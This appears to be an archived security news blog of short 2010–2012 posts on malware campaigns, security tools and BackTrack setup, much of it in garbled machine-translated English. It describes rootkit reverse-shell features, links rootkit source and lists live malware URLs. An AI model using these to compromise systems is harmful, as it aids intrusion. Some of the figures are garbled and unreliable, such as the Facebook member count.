Hacker Source

Zulu – Zscaler Malware Scanning Service

2012-02-08T21:47:00.000+07:00

Zscaler has launched a new freE online service called Zulu that can assess the security risk associated with URLs by analyzing the content they point to, as well as the reputation of their corresponding domain names and IP addresses.

Zulu allows security savvy users who investigate various web attacks to choose what User-Agent and Referrer headers the scanner will use when accessing a URL. “A unique benefit of this approach is that we can deliver a risk score even when the page content is no longer available,” said Michael Sutton, vice president of security research at Zscaler. “While we can’t access the page, we can still assess the URL and host and when they deliver a high risk score despite a lack of page content, one can often conclude the page was indeed malicious but has since been taken down,” he explained. Keep reading

[ source ]

SP Toolkit – Open Source Phishing Education Toolkit

2012-02-05T23:16:00.000+07:00

SP Toolkit – Open Source Phishing Education Toolkit

A new open source toolkit makes it ridiculously simple to set up phishing Web sites and lures. The software was designed to help companies test the phishing awareness of their employees, but as with most security tools, this one could be abused by miscreants to launch malicious attacks.

The spt project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Keep reading

Kaspersky Virus Removal Tool

[ source ]

Fake Angry Birds Game spreading Malware from Android Market

2012-02-01T22:01:00.000+07:00

From last week premium rate SMS Trojans surfaced in the Android Market. Google has pulled 22 apps that are masquerading as legitimate versions of popular games like Angry Birds and Cut the Rope. Security researchers have discovered a way to bypass an Android smartphone owner’s permissions and access private data stored on their smartphone.

Avast Blog explain this as – For example, if someone tried to look for “Cut the rope free”, this malicious application was in the fourth place in the search results. Apps published by the developer Miriada Production may look like well known Android games (Angry birds, Need for speed, World of Goo and others) and users could be easily confused.

The fake apps include “Cut the Rope”, “Need for Speed”, “Assassins Creed”, “Where’s My Water? “,”Riptide GP”, “Great Little War Game”, “World of Goo”, “Angry Birds”, “Shoot The Birds”, “Talking Tom Cat 2″, “Bag It!” and “Talking Larry the Bird”. The apps have been pulled from the Android Market.
The fraudulent apps would install a premium rate SMS Trojan that would rack up hidden charges on the user’s phone bill. The apps would lure customers into clicking on options that would send text messages to premium line numbers leaving the user to foot the bill. According to Lookout Mobile Security, the new threat called RuFraud has been found in an initial batch of apps on the Android Market that include horoscope apps, wallpapers, and game apps that pretend to be legitimate games like Angry Birds.

What will happens if these threats are installed in your mobile devices?
It will attempts to send text messages containing the string “798657” to premium-rate numbers using the infected device’s current default SMS Center (SMSC) by exploiting the Permissions function (android.permission.SEND_SMS), Capable of sending an affected user’s GPS location via HTTP POST, Opens several ports and connects to specific URLs to receive and execute commands from a remote user, Gathers information like International Mobile Equipment Identity (IMEI) and International Mobile Subscriber Identity (IMSI) numbers from infected systems, which is then sent to a specific site and Secretly forwards all incoming text messages to a remote user.

Keep reading

[ source ]

Linux.com down again due to Security Breach

2012-01-29T23:40:00.002+07:00

Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are again down for maintenance due to a security breach that was discovered on September 8, 2011. Investigators yet can’t elaborate the source of attack. Regarding coming back online , Linux.com says “Our team is working around the clock to restore these important services. We are working with authorities and exercising both extreme caution and diligence. Services will begin coming back online in the coming days and will keep you informed every step of the way.” The added “We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.”

Keep reading

SOPA in US and Censorship in India

2012-01-23T00:36:00.000+07:00

As US senators mull over the SOPA(Stopping Online Piracy Act) and PIPA(Protecting Intellectual Property Act) bills, the world stands witness to a historic moment. Almost all big IT companies like Google, Wikipedia, Facebook, Mozilla, Godaddy, etc are speaking in one unanimous voice against SOPA and Internet Censorship. The draconian provisions of SOPA/PIPA are bound to create the deathbed of internet freedom and free speech, and if a careful reading of the proposed legislation is done, one realizes that it is likely to have the same impact on India

Keep reading

The Kaspersky Virus Removal Tool

Facebook Security Tips

2012-01-13T16:29:00.000+07:00

More than 800 members is on Facebook. Making social networking site Facebook as the world’s largest. In addition to the large member, Internet criminals are also interested in the existence of Facebook.
Facebook members should be ready to receive spam every day. 20% risk of malware attacks and 600 thousand pirated accounts reportedly used every day.
How to cope with attacks on Facebook. Can be started from a few tips below.
Use strong passwords with a combination of numbers and letters long.
Never accept an unknown friend.
Remember always your friends who do the sharing and sending messages to you.
Enable HTTPS feature of the settings in Facebook.
Do not click unnecessary links or unclear.
Download Free Security software is also software for security.

The Kaspersky Virus Removal Tool

[ Thatcoin.com ]

Ramnit Attacks Facebook Account

2012-01-07T13:32:00.000+07:00

Win32/Ramnit virus penetrated into networking site Facebook. Win32/Ramnit virus has managed to steal more than 45 thousand Facebook members login worldwide. The majority are exposed to the virus in England and France. Win32/Ramnit brought some parts of other malware to infect Windows systems.
Win32/Ramnit found in April 2010 as a category of Malware. Microsoft Malware Protection Center attack portray Ramnit Windows executable file (EXE), SCR, DLL and HTML, then steal important data and store data FTP and browser cookies.

July 2011, a report from Symantec estimates Ramnit new variants appear. August 2011 from Tusteer mention, Ramnit designed to steal financial data. During September to December 2011, an estimated 800 thousand computers have been infected Ramnit. Varian Ramnit re-emerged, allegedly targeting a Facebook account as a member login.

The Kaspersky Virus Removal Tool

Keep reading

BackBox 2.0.1

2012-01-06T16:49:00.000+07:00

The BackBox team is proud to announce the release 2.01 of BackBox Linux.The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit & 64bit) can be downloaded from the following location: http://www.backbox.org/downloads

What’s new

System upgrade
Performance boost
New look
Improved start menu

Bug corrections

Keep reading

Blackberry OS 10 News

Best Free Android Security Software Avast Antivirus

2012-01-01T21:44:00.000+07:00

For you who longing for free Android antivirus, this is an exciting THN news for you. Avast, one of the famous antivirus vendors, now has launched Android Antivirus you can use for free! This Antivirus mobile is named Avast Mobile Security.
Avast Free Mobile Security supports a number of features that are usually available only in paid-for Android security software. These include privacy reports, call and SMS filtering, SIM-card change notifications, firewall and application management.
By using Avast Mobile Security in your Android phone, your cell phone will be protected from virus, threat, hacker, even it’s able to minimize your loss if your Android cell phone is stolen. The antivirus component supports real-time protection and automatic updates. Updates can be configured to only be downloaded over certain types of connections and the interface can be protected with a password.

Keep reading

[ Thatcoin.com ]

OWASP LiveCD

2011-12-22T17:49:00.000+07:00

Web Testing OWASP LiveCD – contains a selection of programs to test the safety and performance audit of the code of web-applications, acts as an analog of the well-known tool for testing network security BackTrack, but specializes in the web. Last Release OWASP LiveCD was released in 2007, last summer decided to complete processing of the distribution.
The composition of OWASP LiveCD includes programs such as Httprint to determine the type http-server on circumstantial evidence, vulnerability scanners in web-applications Grendel Scan and w3af, utilities to identify opportunities to introduce SQL code SQLiX and sqlmap, means of brute force, the local proxy WebScarab , Paros Proxy, Rat Proxy and Burp Suite, Firefox c 1925 amendments to debug sites.

Microsoft Patch For Duqu

Keep reading

Windows Phone 7.5 Denial of Service Attack Vulnerability

2011-12-20T22:21:00.002+07:00

Windows Phone 7.5 Denial of Service Attack Vulnerability
A malicious SMS sent to a Windows Phone 7.5 device will force it to reboot and lock down the messaging hub . WinRumors reader Khaled Salameh discovered the flaw and reported it to us on Monday. WinRumors said tests revealed that the flaw affected a variety of devices running different builds of the mobile operating system. A Facebook chat message and Windows Live Messenger message will also trigger the bug.

Keep reading

The Kaspersky Virus Removal Tool

2011-12-17T02:26:00.000+07:00

Yahoo Messenger 0-Day Exploit

2011-12-09T02:30:00.000+07:00

Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user's status message. The vulnerability was discovered in the wild by security researchers from antivirus vendor BitDefender while investigating a customer's report about unusual Yahoo Messenger behavior.

The zero-day exploit is present in versions 11.x of the Yahoo Messenger client - including the very last released version. The flaw appears to be located in the application's file transfer API (application programming interface) and allows attackers to send malformed requests that result in the execution of commands without any interaction from victims.

"An attacker can write a script in less than 50 lines of code to malform the message sent via the YIM protocol to the victim," said Bogdan Botezatu, an e-threats analysis & communication specialist at BitDefender. "Status changing appears to be only one of the things the attacker can abuse. We're currently investigating what other things they may achieve," he added.

The attacker sends a supposed file to a target that is actually an iframe that swaps the status message for the attacker's customised text. If successfully executed, a victim will have no indication that his or her status message has been rewritten. The ruse might be used to gain affiliate incomes by promoting dodgy sites as well as directing users towards sites loaded with exploits or scareware scams.

Keep reading

COMODO Cleaning Essentials

2011-12-07T03:01:00.000+07:00

COMODO Cleaning Essentials features:

Portable: No installation is necessary!
DACS, Distributed and Collaborative Scanning
Rootkit and hidden file/key scanner
Aggressive file removing capabilities
KillSwitch, advanced system activity monitoring tool

Homepage

Download COMODO Cleaning Essentials 32 Bit Version

Download COMODO Cleaning Essentials 64 Bit Version

Worm Zeuz re-emerged in the form of links

2011-12-04T21:18:00.000+07:00

Be careful with your Facebook when you see a display like this picture. Worm Zeuz re-emerged in the form of links. JPG. Spread through the social networking site Facebook.
The message such a link Screensaver, when it is opened it will ask to download other files from http://www.offi sense.co.il / lang / b.exe. Then copy the file will go into the user’s system [% username% profile]

Keep reading

CEHv7

2011-12-03T03:55:00.000+07:00

CEHv7 provides a comprehensive ethical hacking and network security-training program to meet the standards of highly skilled security professionals. Hundreds of SMEs and authors have contributed towards the content presented in the CEHv7 courseware. Latest tools and exploits uncovered from the underground community are featured in the new package.
Keep reading

Detecting bugs and vulnerabilities in Linux

2011-11-28T16:52:00.002+07:00

Australian researcher Silvio Cesare, PhD student at Deakin University has released a tool capable of automatically detecting bugs and vulnerabilities in embedded Linux libraries. Developers may “embed” or “clone” code from 3rd party projects. This can be either statically link against external library or maintaining an internal copy of a library’s source or fork a copy of a library’s source.
The Approach of this tools is that if a source package has the other package’s filenames as a subset, it is embedded, Packages that share files are related. A graph of relationships has related packages as cliques. Graph Theory is used to perform the analysis.

Linux vendors have previously used laborious manual techniques to find holes in libraries. Debian alone manually tracks some 420 embedded packages, Cesare said at Ruxcon 2011. Silvio’s tool also automates identifying if embedded packages have outstanding vulnerabilities that have not been patched. Using this system, over 30 previously unknown vulnerabilities were identified in Linux distributions.

Keep reading

CrySyS Duqu Detector Open source Toolkit Released

2011-11-13T20:33:00.000+07:00

Two weeks ago Researchers at the Laboratory of Cryptography and System Security (CrySyS) in Hungary confirmed the existence of the zero-day vulnerability in the Windows kernel, according to security researchers tracking the Stuxnet-like cyber-surveillance Trojan.

The Laboratory of Cryptography and System Security (CrySyS) has released an open-source toolkit that can find traces of Duqu infections on computer networks.The open-source toolkit, from the Laboratory of Cryptography and System Security (CrySyS), contains signature- and heuristics-based methods that can find traces of Duqu infections where components of the malware are already removed from the system.

They make a release that "The toolkit contains signature and heuristics based methods and it is able to find traces of infections where components of the malware are already removed from the system.The intention behind the tools is to find different types of anomalies (e.g., suspicious files) and known indicators of the presence of Duqu on the analyzed computer. As other anomaly detection tools, it is possible that it generates false positives. Therefore, professional personnel is needed to elaborate the resulting log files of the tool and decide about further steps."

This toolkit contains very simple, easy-to-analyze program source code, thus it may also be used in special environments, e.g. in critical infrastructures, after inspection of the source code (to check that there is no backdoor or malicious code inside) and recompiling.

Download Duqu Detector

TheHackerNews.com

Microsoft Patch Exploit Duqu Malware

2011-11-09T12:28:00.000+07:00

Microsoft issued fixes for Windows Fix Kb Duqu 2639658 from malware attacks.

Malware exploit weaknesses in the Windows system TrueType WIN32K engine. If entered into the computer as there are programs that inadvertently infected Duqu. Dugu malware can change the data, create new accounts with full privileges.

Keep reading and download the malware patch

Beware Gadhafi Worm

2011-11-04T18:59:00.000+07:00

The obituary Moamar Gadhafi made the arena for distributing malware. Similar to when Osama bin Laden is dead, Internet criminals take a chance with a hot topic for the spread of malicious programs.

Antivirus company Sophos found Moamar obituaries via email inadvertently infiltrated the Internet worm or worm software. The name of the malicious files found with the name Bloody Photos_Gadhafi_Death \ Gadhafi? Rar.scr made as if to is the file containing the image compression.

Fill complete message from the email worm: Keep reading

[ Thatcoin.com ]

Web Programming

2011-10-25T14:32:00.001+07:00

In making the web, then you will not regardless of what programming language name. Programming language is a technique of command / instruction standards to govern the computer.
Here is an explanation of any programming language used to create a website:

HTML Programming Languages

HyperText Markup Language (HTML) is a markup language used to create a web page and displays various information in an Internet browser.
HTML is now an Internet standard defined and controlled use by the World Wide Web Consortium (W3C).
HTML form tag code that instructs the browser to produce a display according to the desired.
A file is an HTML file can be opened by using a web browser such as Mozilla Firefox or Microsoft Internet Explorer.

PHP Programming Language

PHP is a scripting programming language most widely used today.
PHP was first created by Rasmus Lerdorf in 1995. At that time, PHP was named FI (Form Interpreted), which is his form of a set of scripts used to process the form data from the web.
PHP is widely used to create dynamic web sites, although it was likely used for other usage.
PHP generally runs on the Linux operating system (PHP can also be run with Windows hosting). Keep reading

[ Thatcoin.com ]

The Shellcoder Handbook

2011-10-23T23:22:00.001+07:00

This much-anticipated revision, written by the ultimate group of top security experts in the world, features 40 percent new content on how to find security holes in any operating system or application
New material addresses the many new exploitation techniques that have been discovered since the first edition, including attacking "unbreakable" software packages such as McAfee's Entercept, Mac OS X, XP, Office 2003, and Vista
Also features the first-ever published information on exploiting Cisco's IOS, with content that has never before been explored
The companion Web site features downloadable code files
The black hats have kept up with security enhancements. Have you?
In the technological arena, three years is a lifetime. Since the first edition of this book was published in 2004, built-in security measures on compilers and operating systems have become commonplace, but are still far from perfect. Arbitrary-code execution vulnerabilities still allow attackers to run code of their choice on your system—with disastrous results.
In a nutshell, this book is about code and data and what happens when the two become confused. You'll work with the basic building blocks of security bugs—assembler, source code, the stack, the heap, and so on. You'll experiment, explore, and understand the systems you're running and how to better protect them.
Become familiar with security holes in Windows, Linux, Solaris, Mac OS X, and Cisco's IOS
Learn how to write customized tools to protect your systems, not just how to use ready-made ones
Use a working exploit to verify your assessment when auditing a network
Use proof-of-concept exploits to rate the significance of bugs in software you're developing
Assess the quality of purchased security products by performing penetration tests based on the information in this book
Understand how bugs are found and how exploits work at the lowest level

Download The Shellcoder Handbook

source

Beware Jynx Rootkit

2011-10-19T20:21:00.000+07:00

Jynx Kit is a LD_PRELOAD userland rootkit. Fully undetectable from chkrootkit and rootkithunter. Includes magic packet SSL reverse back connect shell based on SEQ/ACK numbers in a single packet. Solid building block for further LD_PRELOAD rootkits.

Download the source code, here

Source

IE Cookiejacking

2011-10-13T23:00:00.000+07:00

Computer security researchers found a cookie file that can steal important data from the contents of the computer. Recently discovered in Internet Explorer software.
Cookiejacking could open up important data from Facebook, Twitter and Gmail, or other data from the service on the internet. But Microsoft has not committed when the importance of this attack. A little knowledge about the function of the software cookie file of your browser.

What is a Cookie. A file containing the small data created by the application or browser software. Cookie files store information from the site and account data sites.

What is Cookiejacking. A technique to break through and pass through the sieve of the Internet Explorer security. So the attack can take data in IE cookies that should not be read or taken by someone else.

What are the risks. Cookies are recorded in the file by the browser software as the data is less valuable. But if you go to a site Facebook, Google and Gmail. Your account data is in the Cookie. If the computer has been infected Cookiejacking, then your data could be stolen.

Keep reading

Malware Mobile Attacks

2011-10-11T00:22:00.000+07:00

The amount of malware that attack mobile devices increased by 273 percent since the same period last year. Malware can infect many operating systems, is the type most commonly found today.
A lot of malware is designed to make spamming, or sending an SMS without the permission of the owner’s

the perpetrators of most still use the backdoor, spy programs and SMS service to attack their victims. Currently we see much potential risk for mobile devices and users. cybercrime trends by using malware for mobile will continue. Keep reading

[ Thatcoin.com ]

iScanner Detect and Remove Malicious Codes Tools

2011-10-02T01:50:00.000+07:00

iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files.

Current Features:
Ability to scan one file, directory or remote web page / website.
Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.Extensive log shows the infected files and the malicious code.

Keep reading

How to use Facebook

2011-09-29T16:49:00.000+07:00

Rootkit.Win32.TDSS Virus

2011-09-27T13:08:00.000+07:00

Rootkit.Win32.TDSS virus can invade for all Windows, including the 64 bit XP system to Windows 7. The new virus TDL4 indelible even detected. Sometimes the use of processors to 100 percent and run the application Conhost.exe with certain parameters.

If time can be downloaded below to check the computer, the File is only 1.3MB.

Source-x page :
IMPORTANT
• The utility has GUI.
• The utility supports 32-bit and 64-bit operation systems.
• The utility can be run in Normal Mode and Safe Mode.
Disinfection of an infected system
• Download the file TDSSKiller.zip and extract it (use archiver, for example, WInZip) into a folder on the infected (or potentially infected) PC.
• Execute the file TDSSKiller.exe.
• Wait for the scan and disinfection process to be over. It is necessary to reboot the PC after the disinfection is over.

Website Infected With Spams

2011-09-23T14:32:00.001+07:00

The attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised. These sites supposed to be compromised. Most of the hacked sites had outdated versions of WordPress installed

[ TheHackerNews ]

BIOS Mebromi Trojan

2011-09-20T16:23:00.000+07:00

China 360 antivirus companies discovered a unique virus that attacks the three computer systems, either the BIOS, boot sector and Windows systems. This technique makes it difficult to remove viruses Mebromi BMW, although the hard drive is formatted or replaced.

BMW stands for BIOS, masterboot and Windows.

attack techniques

Get into the BIOS to protect the other viruses that exist on the MBR will be attacked again when removed.
Winlogon.exe infects the MBR on duty in Windows XP/2003 or Winnt.exe for Windows 2000. When you are attacked, the other is tasked to download a rootkit
Characterize the virus Mebromi

When Windows starts will appear in the "Find it OK!"
Antivirus software will find and remove the message "Hard disk boot sector virus" but it can not be deleted.
The virus will redirect the browser to the address http://10554.new93.com/index.htm "

The company issued a software antivirus to stop viruses via BMW, click here

The first file can be downloaded, click here

The second file to turn off the virus via the 360 system and for first aid kit, click here

The Kaspersky Virus Removal Tool

2011-09-14T18:59:00.000+07:00

Symantec warns of Trojan Badlib

2011-09-02T14:06:00.000+07:00

This Trojan was a bitch, called Trojan.Badlib. Created to infect computers, when it entered into the computer system so he would react differently. First Trojan.Badlibakan parent tries target computer (C & C), and look what the command will be done. Trojan.Badlib will find a list of IP that are in the main list.

When the first time the parent computer (C & C) was found and send a reply to his job. Trojan.Badlib will download other malware from multiple places that have been ruled by the C & C, and sends the digital signature to ensure the file is retrieved it is true according to his duty.

According to Symantec, Trojan.Badlib attract at least three other trojans is Trojan.Badfaker, Trojan.Badminer, and Infostealer.Badface.

What are the jobs to the 3 trojans taken by Trojan.Badlib

Trojan.Badfaker have to shut down antivirus functions can already infiltrated inside the computer. This Trojan will change the boot the computer into Safe Mode when the computer began to start.

Then delete the files associated with antivirus and antivirus to make it look to duplicate the icon on the computer screen. As if computer owners will still see that the antivirus is still running. Though already been modified by Trojan.Badfaker. Another task is to turn off the firewall and the warnings from the Microsoft Security Center. At the end of the story, this trojan will display false warnings in Russian and English. .. Continue reading

[ Thatcoin ]

How to Upgrade Backtrack 5

2011-08-24T05:36:00.000+07:00

After BackTrack 5 R1 released, BackTrack is time to upgrade from 5. by using a short python script, we can already use BackTrack 5 R1 without having to re-download.
..Continue Reading ( Skip Ads )
[ Thatcoin.com ]

Fake CCleaner

2011-08-23T14:29:00.000+07:00

Now the official software used deceptive means to ask for money to register the software.

CCleaner is a free utility, and charged $ 24.95 for full version or premium. This software is used as a means of cheating by asking for cheaper registration costs $ 5. Ccsetup303.exe file is a fake software, will ask for registration fee to activate.

Continue Reading

[ Thatcoin.com ]

Malware Spread Via Internet

2011-08-08T21:37:00.000+07:00

Engineers from the company Google found about 1 million computers attacked by Search Hijack. When looking for data on the internet, the browser will be directed by malware is lurking. This type of attack has occurred approximately 1 year.

Google today added another layer of protection from searches on Google.com. Then give a warning to the owner of the computer at Google.com page, that the computer contained malware.

Finding it may be easier, but more difficult to clean. Computer users should always update your antivirus and clean the computer if already infected.

Generally links are hijacked by malware will be thrown back to specific sites such as porn sites, fake antivirus, other malware and other sites.
Google can only help to inform the user’s computer from the Google.com page. The rest handed over ownership to clean up computer

{ Thatcoin.com ]

Be carefull Fake Antivirus on Firefox

2011-06-18T20:45:00.000+07:00

For Firefox browser users be careful when you get a message on the browser. That your computer system needs to be updated. Of special interest to the layman with a computer to see updates and direct click.
Microsoft software update usually comes from the Internet Explorer browser and not from outside Microsoft’s software.

Display the Microsoft website was created as closely as possible to fool a lot of casualties.

Files that are downloaded at 2.8MB is malware that will infect your computer. Be careful, do not get stuck this new technique

[ Thatcoin.com ]

Fake Antivirus on Facebook

2011-06-12T19:09:00.000+07:00

Fake antivirus is still the target to the user facebook. To be directed to a specific site and download a fake antivirus.

The subject is made interesting emails like “IMF boss Dominique Strauss-Kahn Exclusive Rape Videos – Black lady under attack!”dab “oh shit, one more really Freaky video O_O”. And much more fake links that trap.
Some links will link to another site that is Newtubes.in. Last name not be placed at sites in India, but the server is located in the state of Lithuania.

If you want to view streaming video content with the name of the Youtube site. We recommend that you check the link given before becoming a victim of fraudsters on the internet.

When this target is not the dominance of anti-counterfeit computer users of Windows OS, but Apple’s Mac becomes a target.

Researcher’s security said in the 16 hours of the attack. Up notable to block dangerous links and keep spreading. Though the name of the topic or subject of the link has not changed, and continues to appear on Facebook pages.

Better be careful, before you bothered because one click and fake antivirus warning appears on the screen of your computer.
[ Thatcoin.com ]

Malware Attacking Windows 7

2011-05-17T16:46:00.002+07:00

Microsoft reported attacks in Windows 7 from Malware attacksrose 30% in 2010.Sedangkan Windows XP down 20%.
Computer with Windows 7 32bit, on average there are 4 of 1000computers infected with malware. While the lower 64 bit OS to 2.5per 1000 computers in 2010. From 3 OS which is owned byMicrosoft, only Windows XP has decreased attacks.

The new report obtained from the use of software Malicious Software Removal Tool (MSRT), which provided free by Microsoftto check to see computers against viruses, fake antivirus, trojans and other malware.

[ Thatcoin.com ]

Beware Facebook Malware

2011-05-10T18:15:00.000+07:00

Fortinet mention the 2 variants of malware attacking up. Deceive with words your password has been reset, and a file was taken via email with your new password is in the file.

Malicious files in email is a file botnet. When the infected computer will become slaves botnet controlled by a central computer and other. Malware software works silently in the background or without being noticed by the owner of the computer. Be careful when you receive an email with a file attachment.
[ Thatcoin.com ]

Antivirus for Windows 7

2011-05-03T18:34:00.000+07:00

AVtest publishing capabilities Antivirus product. Test carried out for Windows 7 in the first quarter of this year.

Below is a list of antivirus software that passes the test with Windows 7

Avast: Free AntiVirus 5.0 and 6.0
AVG: Internet Security 10.0
Avira: Premium Security Suite 10.0
BitDefender: Internet Security Suite 2011
BullGuard: Internet Security 10.0
Eset: Smart Security 4.2
F-Secure: Internet Security 2011
G Data Internet Security 2011
Kaspersky: Internet Security 2011
Microsoft: Security Essentials 2.0
MicroWorld: eScan Internet Security Suite 11.0
Panda: Internet Security 2011
Sophos: Endpoint Security and Control 9.5
Sunbelt: VIPRE Antivirus Premium 4.0
Symantec: Norton Internet Security 2011
Trend Micro: Titanium Internet Security 2011
Webroot: Complete Internet Security 7.0

BitDefender, F-Secure and Symantec entered score Top 15
G Data, Kaspersky, and Panda get a score of 14
AVG score of 13.5
Sophos 13
ESET, Trend Micro, and Webroot, score 12.5
GFI only get 12 score
Avast, Avira, eScan, and Microsoft was awarded a score of 11.5
And BullGuard bottom with a score of 11

There are 5 who failed the test antivirus test in Windows 7

CA: Internet Security Suite 2011
Comodo: Premium Internet Security 5.0 and 5.3
McAfee: Total Protection 2011
Norman: Security Suite Pro 8.0
PC Tools: Internet Security 2011

The lowest figures are McAfee and Norman, score 8.5. Both have error alerts on specific software.

[ Thatcoin.com ]

Backtrack 5

2011-04-14T22:15:00.000+07:00

BackTrack 5 will be based on Ubuntu Lucid (10.04 LTS), and will (finally) support both 32 bit and 64 bit architectures.
We will be officially supporting KDE 4, Gnome and Fluxbox while providing users streamlined ISO downloads of each Desktop Environment (DE). Tool integration from our repositories

will be seamless with all our supported DE’s, including the specific DE menu structure
[ Thatcoin.com ]

Kaspersky Virus Removal Tool 2010

2011-04-08T19:55:00.000+07:00

The Kaspersky Virus Removal Tool application was designed to be another virus scanner and detection software from Kaspersky. The produst will scan the specified locations for any virus threats and remove them or send to Quarantine folder.

Kaspersky Virus Removal Tool 2010 is a utility designed to remove all types of threats from computers. Kaspersky Virus Removal Tool 2010 uses the effective detection algorithms realized in Kaspersky Anti-Virus and AVZ.

Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software.

Advantages:

Simplified interface.
Can be installed to an infected computer (Safe Mode supported).
Composite scan and disinfection system: signature detection and heuristic analyzer.
Gathering system information and interactive creation of scripts for disinfection.

General functions:

Automatic and manual removal of virus, Trojans and worms.
Automatic and manual removal of Spyware and Adware modules.
Automatic and manual removal of all types of rootkits.
Kaspersky Virus Removal Tool 2010 is Freeware.

[Thatcoin.com]
Download support.kaspersky.com/viruses/avptool2010?level=2

Beware Virus Win32 Injector FBK

2011-03-19T14:26:00.000+07:00

Again DHL International Courier company name used by spammers from Poland
Bringing a Message
Subject of email
Dear customer. DHL notification

The parcel was send your home address.

And it will of arrice Within 7 bussness day.

More information and the tracking number

are attached in the document below.

Thank you.

2011 DHL International GmbH. All rights reserverd.

With files document.zip, in which there is exe file contains a virus Win32/Injector.FBK.Trojan DHL_notification.exe
[Thatcoin.com]

Beware Facebook Links contain with Malware

2011-02-08T15:23:00.000+07:00

One more attacks on up, give a message “hahahh” , do not be clicked
The link is ordered that smuggle malware links. And display a fake screen of another site with the message “Photo has been Moved.”

When the click on the photos, taken is malware. If the downloaded program is executed, then the browser will at the plow, and can not open facebook and display ads from the manufacturer

Source and read full article

Delete and Restore Files

2010-08-15T21:03:00.000+07:00

Addition restore deleted files a false moment, FileWing can also delete files permanently. FileWing will find deleted files and displays them. During not overwritten, the file is not a problem to be saved. FileWing can also delete the data completely to overwrite it again.
Tips
FileWing also able to handle an external drive. Thus, this application is suitable for rescue deleted photos on digital cameras.
Source

Using Facebook Tips

2010-08-12T18:41:00.000+07:00

Facebook users are easy prey for criminals along with the number of people share information. Every day people put themselves at risk by clicking on an imprudent to invitations sent by friends to join the group or write in their walls.
Think about what you add.
Receiving a request provided by a new friend asks posting, photo messaging and information about your personal background. Watch your friends list and think back to who is entitled to access your personal stuff.
Check the privacy settings. Facebook recently did the update, set the privacy from scratch can be very meaningful.

Footwear of being on Facebook. Do share your photos? Stay in touch with other people? Share links and updates the activity? Ask yourself what you want to obtain a personal profile. Thus, cut will be more personal information that is publish
Source and read the complete article

Saving Password into DataInherit

2010-08-11T22:54:00.002+07:00

As many 50 passwords and some important documents you can store the data into DataInherit online services. A Free service that combines online stroge and data privacy gives allocation of file storage for 10 mb. Another advantage, through the iPhone, you can also access an account that has been made.
Source

Bootable BT4 USB stick

2010-04-09T21:29:00.000+07:00

If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To: “Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).
To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.
Well, when you finish Step 5 you will need to follow the instructions below:
Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:
mount /dev/sdc2 /mnt/sdc2
cd /mnt/sdc2
mkdir changes
Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:
cd /boot/syslinux
chmod +Xx lilo
chmod +Xx syslinux
Then you need to open syslinux.cfg and modify it. To do that execute the commands:
cd /mnt/sdc1/boot/syslinux
kwrite syslinux.cfg
I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:
1. “LABEL BT4″
2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.
3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.
4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.
5. Save your changes and exit the editor.
That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.

Source

Chrooting Apache2 With mod_chroot On Fedora 12

2010-04-09T21:25:00.002+07:00

This guide explains how to set up mod_chroot with Apache2 on a Fedora 12 system. With mod_chroot, you can run Apache2 in a secure chroot environment and make your server less vulnerable to break-in attempts that try to exploit vulnerabilities in Apache2 or your installed web applications. I do not issue any guarantee that this will work for you!

Preliminary Note

I'm assuming that you have a running Fedora 12 system with a working Apache2, e.g. as shown in this tutorial: The Perfect Server - Fedora 12 x86_64 [ISPConfig 2]. In addition to that I assume that you have one or more web sites set up within the /var/www directory (e.g. if you use ISPConfig).

Source and read this full article at HowToForge

Using BT4 On VirtualBox

2010-03-16T19:39:00.000+07:00

Just some quick installation notes for those looking wanting to install the recent Virtualbox release (3.0.4) for Backtrack 4. In case you don't know yet - BT4 is the most top rated linux live distribution focused on penetration testing. The new Debian core (Ubuntu 8.10) makes Backtrack 4 easily extendable.

I'm a huge fan of Backtrack and use it as primary Operating System (HD Installation) on one of my laptops, currently studying for the Offensive Security course "Penetration Testing with BackTrack".

If you are looking for some pointers to get BT4 persistent changes without HD installation, @kriggins "Backtrack 4 USB persistent changes Nessus HowTo" is highly recommended.

Installation

Add the following line to your /etc/apt/sources.list:

deb http://download.virtualbox.org/virtualbox/debian intrepid non-free
Add the following key to your keyring (verify!):

# wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -
Update your package cache

# apt-get update
Install Virtualbox packages

# apt-get install virtualbox-3.0
